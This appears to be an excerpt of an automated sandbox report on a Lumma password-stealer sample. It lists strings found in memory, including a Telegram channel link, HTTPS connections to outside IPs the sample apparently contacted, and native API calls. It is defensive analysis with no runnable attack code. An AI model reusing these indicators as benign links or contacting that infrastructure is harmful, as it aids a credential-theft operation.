        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154496777.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/owowoowokk3j4
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=d8f552d865141d84e1_110265872041
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2

        System Summary

        barindex
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C6B8 NtReadFile,0_2_00E4C6B8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C650 NtSetInformationFile,0_2_00E4C650
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C634 NtClose,0_2_00E4C634
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C7F0 NtProtectVirtualMemory,0_2_00E4C7F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C710 NtCreateFile,0_2_00E4C710
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C0B0 NtSetValueKey,0_2_00E4C0B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C070 NtEnumerateKey,0_2_00E4C070
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C028 NtCreateKey,0_2_00E4C028
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C1E0 NtQueryMultipleValueKey,0_2_00E4C1E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C180 NtNotifyChangeKey,0_2_00E4C180
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C2E0 NtWriteFile,0_2_00E4C2E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C2C4 NtTerminateProcess,0_2_00E4C2C4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C27C NtSetInformationKey,0_2_00E4C27C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C3F4 NtDuplicateObject,0_2_00E4C3F4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C36C NtQueryDirectoryFile,0_2_00E4C36C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C338 NtQueryObject,0_2_00E4C338
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C4EC NtUnlockFile,0_2_00E4C4EC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C48C NtLockFile,0_2_00E4C48C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C43C NtQueryVolumeInformationFile,0_2_00E4C43C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C5EC NtCreateSection,0_2_00E4C5EC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C58C NtMapViewOfSection,0_2_00E4C58C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C558 NtQuerySection,0_2_00E4C558
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C53C NtUnmapViewOfSection,0_2_00E4C53C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C684 NtQueryInformationFile,0_2_00E4C684
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4C778 NtOpenFile,0_2_00E4C778
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BBE4 NtCreateThread,0_2_00E4BBE4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BBB0 NtQueryInformationProcess,0_2_00E4BBB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BB50 NtDeviceIoControlFile,0_2_00E4BB50
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BCF8 NtCreateUserProcess,0_2_00E4BCF8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BCA0 NtCreateProcessEx,0_2_00E4BCA0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BC50 NtCreateProcess,0_2_00E4BC50
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BDE0 NtQuerySecurityObject,0_2_00E4BDE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BD8C NtSetVolumeInformationFile,0_2_00E4BD8C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BD60 NtOpenKeyEx,0_2_00E4BD60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BE6C NtFsControlFile,0_2_00E4BE6C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BE14 NtNotifyChangeDirectoryFile,0_2_00E4BE14
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BFE8 NtQueryValueKey,0_2_00E4BFE8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BFB4 NtQueryKey,0_2_00E4BFB4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BF74 NtEnumerateValueKey,0_2_00E4BF74
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BF54 NtOpenKey,0_2_00E4BF54
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4BF04 NtAccessCheck,0_2_00E4BF04
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EAACA4: CreateFileA,DeviceIoControl,0_2_00EAACA4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA60930_2_00DA6093
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDA2500_2_00DDA250
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DD65500_2_00DD6550
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DE06800_2_00DE0680
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9E6700_2_00D9E670
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAE8FA0_2_00DAE8FA
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DE09A00_2_00DE09A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA2A170_2_00DA2A17
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDEDF00_2_00DDEDF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DE0EE00_2_00DE0EE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC11F00_2_00DC11F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DB97B00_2_00DB97B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA17450_2_00DA1745
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9B9000_2_00D9B900
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAFD270_2_00DAFD27
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DBDEE00_2_00DBDEE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDFE600_2_00DDFE60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9A1D00_2_00D9A1D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9C1C00_2_00D9C1C0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDE1A00_2_00DDE1A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EAA2640_2_00EAA264
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DB62300_2_00DB6230
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDE2300_2_00DDE230
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA24140_2_00DA2414
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EF24340_2_00EF2434
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DBE6800_2_00DBE680
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAC6A60_2_00DAC6A6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9C6100_2_00D9C610
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EAA6000_2_00EAA600
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDA7F00_2_00DDA7F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D927500_2_00D92750
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D947720_2_00D94772
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EFC8C40_2_00EFC8C4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC08B00_2_00DC08B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E7882C0_2_00E7882C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EF880C0_2_00EF880C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDE9600_2_00DDE960
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D92AF00_2_00D92AF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EAAA400_2_00EAAA40
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D98A000_2_00D98A00
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00ECAA040_2_00ECAA04
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E5CBB00_2_00E5CBB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA2CBB0_2_00DA2CBB
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00F04C380_2_00F04C38
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDAC000_2_00DDAC00
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E66C0C0_2_00E66C0C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9CDB00_2_00D9CDB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EFED680_2_00EFED68
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA6D3A0_2_00DA6D3A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA4EEA0_2_00DA4EEA
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EF0E4C0_2_00EF0E4C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D98E700_2_00D98E70
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DACE020_2_00DACE02
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E34FF00_2_00E34FF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EDEFF00_2_00EDEFF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA0F900_2_00DA0F90
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D96F760_2_00D96F76
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D910400_2_00D91040
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EFB05C0_2_00EFB05C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00F030480_2_00F03048
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EFF01C0_2_00EFF01C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EF913C0_2_00EF913C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA32970_2_00DA3297
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DE12300_2_00DE1230
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAB3D00_2_00DAB3D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D993F00_2_00D993F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9B3B00_2_00D9B3B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D934F00_2_00D934F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9D4B00_2_00D9D4B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EC54980_2_00EC5498
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC34A00_2_00DC34A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDF4000_2_00DDF400
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D935E70_2_00D935E7
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DB55500_2_00DB5550
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA75510_2_00DA7551
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DD76B00_2_00DD76B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC16000_2_00DC1600
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC16200_2_00DC1620
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DB17D00_2_00DB17D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DAD70D0_2_00DAD70D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DD58D00_2_00DD58D0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DCD9F00_2_00DCD9F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA79900_2_00DA7990
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E3F97C0_2_00E3F97C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EE59580_2_00EE5958
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DB59100_2_00DB5910
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA7AC80_2_00EA7AC8
